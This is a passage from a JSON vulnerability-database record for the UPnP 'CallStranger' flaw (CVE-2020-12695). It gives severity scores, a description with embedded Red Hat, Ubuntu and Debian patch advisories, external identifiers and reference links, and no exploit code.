"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-12695",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-006708",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202006-597",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-165399",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2020-12695",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Open Connectivity Foundation UPnP specification before 2020-04-17 does not forbid the acceptance of a subscription request with a delivery URL on a different network segment than the fully qualified event-subscription URL, aka the CallStranger issue. The Universal Plug and Play (UPnP) protocol in effect prior to April 17, 2020 can be abused to send traffic to arbitrary destinations using the SUBSCRIBE functionality. The UPnP protocol, as specified by the Open Connectivity Foundation (OCF), is designed to provide automatic discovery and interaction with devices on a network. The UPnP protocol is designed to be used in a trusted local area network (LAN) and the protocol does not implement any form of authentication or verification. Many common Internet-connected devices support UPnP, as noted in previous research from Daniel Garcia (VU#357851) and Rapid7. Garcia presented at DEFCON 2019 and published a scanning and portmapping tool. The UPnP Device Protection service was not widely adopted. A vulnerability in the UPnP SUBSCRIBE capability permits an attacker to send large amounts of data to arbitrary destinations accessible over the Internet, which could lead to a Distributed Denial of Service (DDoS), data exfiltration, and other unexpected network behavior. The OCF has updated the UPnP specification to address this issue. This vulnerability has been assigned CVE-2020-12695 and is also known as Call Stranger. Although offering UPnP services on the Internet is generally considered to be a misconfiguration, a number of devices are still available over the Internet according to a recent Shodan scan. A remote, unauthenticated attacker may be able to abuse the UPnP SUBSCRIBE capability to send traffic to arbitrary destinations, leading to amplified DDoS attacks and data exfiltration. In general, making UPnP available over the the Internet can pose further security vulnerabilities than the one described in this vulnerability note. Open Connectivity Foundation UPnP There is a vulnerability in the specification regarding improper default permissions.Information is obtained and service operation is interrupted (DoS) It may be put into a state. A security vulnerability exists in UPnP versions prior to 2020-04-17. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: gssdp and gupnp security update\nAdvisory ID: RHSA-2021:1789-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:1789\nIssue date: 2021-05-18\nCVE Names: CVE-2020-12695\n====================================================================\n1. Summary:\n\nAn update for gssdp and gupnp is now available for Red Hat Enterprise Linux\n8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat CodeReady Linux Builder (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nGUPnP is an object-oriented open source framework for creating UPnP devices\nand control points, written in C using GObject and libsoup. The GUPnP API\nis intended to be easy to use, efficient and flexible. \n\nGSSDP implements resource discovery and announcement over SSDP and is part\nof gUPnP. \n\nThe following packages have been upgraded to a later upstream version:\ngssdp (1.0.5), gupnp (1.0.6). (BZ#1846589, BZ#1861928)\n\nSecurity Fix(es):\n\n* hostapd: UPnP SUBSCRIBE misbehavior in WPS AP (CVE-2020-12695)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.4 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1846006 - CVE-2020-12695 hostapd: UPnP SUBSCRIBE misbehavior in WPS AP\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 8):\n\nSource:\ngssdp-1.0.5-1.el8.src.rpm\ngupnp-1.0.6-1.el8.src.rpm\n\naarch64:\ngssdp-1.0.5-1.el8.aarch64.rpm\ngssdp-debuginfo-1.0.5-1.el8.aarch64.rpm\ngssdp-debugsource-1.0.5-1.el8.aarch64.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm\ngupnp-1.0.6-1.el8.aarch64.rpm\ngupnp-debuginfo-1.0.6-1.el8.aarch64.rpm\ngupnp-debugsource-1.0.6-1.el8.aarch64.rpm\n\nppc64le:\ngssdp-1.0.5-1.el8.ppc64le.rpm\ngssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngssdp-debugsource-1.0.5-1.el8.ppc64le.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngupnp-1.0.6-1.el8.ppc64le.rpm\ngupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm\ngupnp-debugsource-1.0.6-1.el8.ppc64le.rpm\n\ns390x:\ngssdp-1.0.5-1.el8.s390x.rpm\ngssdp-debuginfo-1.0.5-1.el8.s390x.rpm\ngssdp-debugsource-1.0.5-1.el8.s390x.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm\ngupnp-1.0.6-1.el8.s390x.rpm\ngupnp-debuginfo-1.0.6-1.el8.s390x.rpm\ngupnp-debugsource-1.0.6-1.el8.s390x.rpm\n\nx86_64:\ngssdp-1.0.5-1.el8.i686.rpm\ngssdp-1.0.5-1.el8.x86_64.rpm\ngssdp-debuginfo-1.0.5-1.el8.i686.rpm\ngssdp-debuginfo-1.0.5-1.el8.x86_64.rpm\ngssdp-debugsource-1.0.5-1.el8.i686.rpm\ngssdp-debugsource-1.0.5-1.el8.x86_64.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.i686.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm\ngupnp-1.0.6-1.el8.i686.rpm\ngupnp-1.0.6-1.el8.x86_64.rpm\ngupnp-debuginfo-1.0.6-1.el8.i686.rpm\ngupnp-debuginfo-1.0.6-1.el8.x86_64.rpm\ngupnp-debugsource-1.0.6-1.el8.i686.rpm\ngupnp-debugsource-1.0.6-1.el8.x86_64.rpm\n\nRed Hat CodeReady Linux Builder (v. 8):\n\naarch64:\ngssdp-debuginfo-1.0.5-1.el8.aarch64.rpm\ngssdp-debugsource-1.0.5-1.el8.aarch64.rpm\ngssdp-devel-1.0.5-1.el8.aarch64.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm\ngupnp-debuginfo-1.0.6-1.el8.aarch64.rpm\ngupnp-debugsource-1.0.6-1.el8.aarch64.rpm\ngupnp-devel-1.0.6-1.el8.aarch64.rpm\n\nnoarch:\ngssdp-docs-1.0.5-1.el8.noarch.rpm\n\nppc64le:\ngssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngssdp-debugsource-1.0.5-1.el8.ppc64le.rpm\ngssdp-devel-1.0.5-1.el8.ppc64le.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm\ngupnp-debugsource-1.0.6-1.el8.ppc64le.rpm\ngupnp-devel-1.0.6-1.el8.ppc64le.rpm\n\ns390x:\ngssdp-debuginfo-1.0.5-1.el8.s390x.rpm\ngssdp-debugsource-1.0.5-1.el8.s390x.rpm\ngssdp-devel-1.0.5-1.el8.s390x.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm\ngupnp-debuginfo-1.0.6-1.el8.s390x.rpm\ngupnp-debugsource-1.0.6-1.el8.s390x.rpm\ngupnp-devel-1.0.6-1.el8.s390x.rpm\n\nx86_64:\ngssdp-debuginfo-1.0.5-1.el8.i686.rpm\ngssdp-debuginfo-1.0.5-1.el8.x86_64.rpm\ngssdp-debugsource-1.0.5-1.el8.i686.rpm\ngssdp-debugsource-1.0.5-1.el8.x86_64.rpm\ngssdp-devel-1.0.5-1.el8.i686.rpm\ngssdp-devel-1.0.5-1.el8.x86_64.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.i686.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm\ngupnp-debuginfo-1.0.6-1.el8.i686.rpm\ngupnp-debuginfo-1.0.6-1.el8.x86_64.rpm\ngupnp-debugsource-1.0.6-1.el8.i686.rpm\ngupnp-debugsource-1.0.6-1.el8.x86_64.rpm\ngupnp-devel-1.0.6-1.el8.i686.rpm\ngupnp-devel-1.0.6-1.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-12695\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYKPxUtzjgjWX9erEAQhZhw//Ypgq/0qu2SS/hw8alPmqQ6CG5C/xOqF6\nuJL5HVQ+KPu8Go+UifB3xP3Izm9GYh9aNpcR3bPTx3NsfJdQyzPNSo8O2bC3mUBl\nLw6Bh++uhaNx3ADaKfceEG5teXbkwAadSft0W7j9jiY70qjVWfvqKjzBS3UyOL/P\n++SdPU96uOX9nAkeT3wqirWjXDjUMJLao6AvRtXOXJ2MNwJp436S/KemSkMq2Mg7\nizSYf7Biojg5SMNM4rsFBSnIqmehomfsVFetttHImCfTYteTfddti42gMelZyG8k\nMK4CJw1DeR1e30teWaHnoVa9xAPJMKx56RG3/Wr+6Y5nK0rFZoZuMiJn2b7KodcH\nfYbfxkwrQQ/R9bYZn03YgCz4zl/hetsoITKFHcsPNB9qtdRdtQhYzeOG+AyiawWh\nYtF3vlomMlaxuOZV9zTJUIWZX/ev6wWx8VsXuHKMBwtBxO7l3M0Hd+BOxRPVE/mu\nm+DBcBQp7fvaw55tCAQtHS3CKvgGYijDvOFHBOkQw5Zh9ttdfLlKo4H4NU0W4dLN\nHJWuKGelB2vGc0eoqZ7yCi2xuWBYxjDIoYGzlwPJSnrrguqeLfOKVykja8AYpIET\nV/XCUk/geIiEbSRwAR8EPXDpTLLicGrR6pbekpMfALm/GGc5I4RyA9AbVNJ9fF+a\n7bb2GlcOcWo=2GSN\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. (CVE-2020-12695)\n\nIt was discovered that ReadyMedia (MiniDLNA) allowed remote code execution. =========================================================================\nUbuntu Security Notice USN-4734-2\nFebruary 16, 2021\n\nwpa vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in wpa_supplicant and hostapd. \n\nSoftware Description:\n- wpa: client support for WPA and WPA2\n\nDetails:\n\nUSN-4734-1 fixed several vulnerabilities in wpa_supplicant. This\nupdate provides the corresponding update for Ubuntu 14.04 ESM. \n\nIt was discovered that wpa_supplicant did not properly handle P2P\n(Wi-Fi Direct) group information in some situations, leading to a\nheap overflow. A physically proximate attacker could use this to cause a\ndenial of service or possibly execute arbitrary code. (CVE-2021-0326)\n\nIt was discovered that hostapd did not properly handle UPnP subscribe\nmessages in some circumstances. An attacker could use this to cause a\ndenial of service. (CVE-2020-12695)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n hostapd 1:2.1-0ubuntu1.7+esm3\n wpasupplicant 2.1-0ubuntu1.7+esm3\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2:2.7+git20190128+0c1e29f-6+deb10u3. \n\nWe recommend that you upgrade your wpa packages. \n\nFor the detailed security status of wpa please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/wpa\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmCBxcZfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0QRbw//chJxW9vhszfe/MrHkuEBC/y0jzkQ0GxJG/DT+EXvHnq8KyVht92B81sU\nIa860UeNygOY1vAe8izNVpxPEi1PpI7Y6VfvqcWC5dMFNEmOk8yMzJXPDYtwrO3b\nq7Fq6MJys6HTooIInCVjdwVTmvVfocEiOl2Oy+smBE8ylkUPIShJj+UsnBR3qMCB\n9IoxgeFsHl4HpRzsC1uiTMmNPUqqychqzyn26aA+Vp5nfPkvpsSc6aA68BBUm529\n5udANpQneYrsQ+EKMm2wQmw9xNWbrqzRUCmi/XGxJ5YEibOjMLZeBMWq35MRQKDS\nBaaEPbjPMbBP7p6yp795pdt/XgNL1cJPejEBBQWPs3PrRuW/inhjJbSvenPl5AIB\nwOV8OzoxDw0m5DdYr2IuYRNu3zt743e/v5oDhDOiSteBl7zjs4cUohfOryaH/htN\n7Ok3BbhfVc7xfW/XhXNq2axXPGDdSOI3Y6ZXPgiTlX3eIm8Culg7Rm52JprbAc0a\naP0pkGjHO3MAIsvRU/H7WGJbhCdS0i/XTAbuJming5zzCpigGaQG9wOawYH4lNJV\nBNEX/DjjcsZ4oETxWn0sG/LVIl3m2TCry2cayZsy8806nTqlhFS2py5tx6gn5NBi\ne5JGaYRgwa6TUxj4UjWnbdIKMpElbtXbMIOHSvG2Gnx/21siyg0=\n=CU/j\n-----END PGP SIGNATURE-----\n. In addition minidlna was susceptible to the\n\"CallStranger\" UPnP vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12695"
},
{
"db": "CERT/CC",
"id": "VU#339275"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "PACKETSTORM",
"id": "162672"
},
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "PACKETSTORM",
"id": "161444"
},
{
"db": "PACKETSTORM",
"id": "161397"
},
{
"db": "PACKETSTORM",
"id": "169049"
},
{
"db": "PACKETSTORM",
"id": "168951"
}
],
"trust": 3.15
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-12695",
"trust": 4.1
},
{
"db": "CERT/CC",
"id": "VU#339275",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "158051",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2020/06/08/2",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "161288",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162672",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159172",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021122905",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021052202",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1382",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0575",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4315",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1728",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0417",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4372",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2705",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4315.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2733",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3160",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "161444",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "161397",
"trust": 0.2
},
{
"db": "CNVD",
"id": "CNVD-2020-37941",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-165399",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-12695",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169049",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168951",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#339275"
},
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "PACKETSTORM",
"id": "162672"
},
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "PACKETSTORM",
"id": "161444"
},
{
"db": "PACKETSTORM",
"id": "161397"
},
{
"db": "PACKETSTORM",
"id": "169049"
},
{
"db": "PACKETSTORM",
"id": "168951"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"id": "VAR-202006-0391",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-165399"
}
],
"trust": 0.6333333333333333
},
"last_update_date": "2024-07-23T21:20:57.987000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RT-N11",
"trust": 0.8,
"url": "https://www.asus.com/us/networking/rtn11/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.broadcom.com/"
},
{
"title": "Canon SELPHY CP1200",
"trust": 0.8,
"url": "https://en.canon-me.com/support/consumer_products/products/printers/compact_photo/cd__cp_series/selphy_cp1200.html?type=drivers\u0026language=\u0026os=windows%208.1%20(64-bit)"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.cisco.com/c/en/us/index.html"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://us.dlink.com/en/consumer"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.dell.com/en-us"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://community.ui.com/"
},
{
"title": "hostapd",
"trust": 0.8,
"url": "https://jvndb.jvn.jp/ja/contents/2019/jvndb-2019-013311.html"
},
{
"title": "Debian CVElist Bug Report Logs: wpa: CVE-2020-12695",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=cdef40da4b3b6b2f4fcf08e447d20494"
},
{
"title": "Debian Security Advisories: DSA-4806-1 minidlna -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=5e0b1e00748aee507290bde9650370c7"
},
{
"title": "Arch Linux Advisories: [ASA-202012-16] hostapd: proxy injection",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202012-16"
},
{
"title": "Debian Security Advisories: DSA-4898-1 wpa -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=2832d7aeef980951ddf42089219be7b3"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2020-12695 log"
},
{
"title": "awesome-from-stars",
"trust": 0.1,
"url": "https://github.com/krzemienski/awesome-from-stars "
},
{
"title": "callstranger-detector",
"trust": 0.1,
"url": "https://github.com/corelight/callstranger-detector "
},
{
"title": "CallStranger",
"trust": 0.1,
"url": "https://github.com/yunuscadirci/callstranger "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/xcod3bughunt3r/callstranger "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/yunuscadirci/dialstranger "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/aoeii/asuswrt-for-tenda-ac9-router "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-276",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://www.kb.cert.org/vuls/id/339275"
},
{
"trust": 2.5,
"url": "https://github.com/yunuscadirci/callstranger"
},
{
"trust": 2.5,
"url": "https://www.tenable.com/blog/cve-2020-12695-callstranger-vulnerability-in-universal-plug-and-play-upnp-puts-billions-of"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/158051/callstranger-upnp-vulnerability-checker.html"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2020/dsa-4806"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2021/dsa-4898"
},
{
"trust": 1.7,
"url": "https://corelight.blog/2020/06/10/detecting-the-new-callstranger-upnp-vulnerability-with-zeek/"
},
{
"trust": 1.7,
"url": "https://github.com/corelight/callstranger-detector"
},
{
"trust": 1.7,
"url": "https://www.callstranger.com"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00011.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00013.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00017.html"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2020/06/08/2"
},
{
"trust": 1.7,
"url": "https://usn.ubuntu.com/4494-1/"
},
{
"trust": 1.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12695"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/l3shl4lofghj3dixsuiqelgvbdj7v7lb/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/mzdwhkgn3lmgsueoaavamod3iuipjvoj/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rqeyvy4d7lash6ai4wk3ik2qbfhhf3q2/"
},
{
"trust": 0.8,
"url": "https://callstranger.com"
},
{
"trust": 0.8,
"url": "https://openconnectivity.org/developer/specifications/upnp-resources/upnp/"
},
{
"trust": 0.8,
"url": "https://kb.cert.org/vuls/search/?q=upnp"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12695"
},
{
"trust": 0.8,
"url": "https://jvn.jp/ta/jvnta95827565/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rqeyvy4d7lash6ai4wk3ik2qbfhhf3q2/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/mzdwhkgn3lmgsueoaavamod3iuipjvoj/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/l3shl4lofghj3dixsuiqelgvbdj7v7lb/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021052202"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4372/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1728"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162672/red-hat-security-advisory-2021-1789-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122905"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0417"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3160/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2733/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1382"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159172/ubuntu-security-notice-usn-4494-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4315.2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0575"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2705/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4315/"
},
{
"trust": 0.6,
"url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20200701-01-upnp-cn"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161288/ubuntu-security-notice-usn-4722-1.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/upnp-information-disclosure-via-subscribe-delivery-url-32701"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0326"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28926"
},
{
"trust": 0.2,
"url": "https://usn.ubuntu.com/4734-1"
},
{
"trust": 0.2,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.2,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12695"
},
{
"trust": 0.1,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/gupnp/1.2.3-0ubuntu0.20.04.1"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4494-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.2.1+dfsg-1ubuntu0.18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.2.1+dfsg-1ubuntu0.20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.1.5+dfsg-2ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/minidlna/1.2.1+dfsg-2ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4722-1"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4734-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2.4-0ubuntu6.7"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2:2.9-1ubuntu8.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2:2.6-15ubuntu2.7"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/wpa/2:2.9-1ubuntu4.2"
},
{
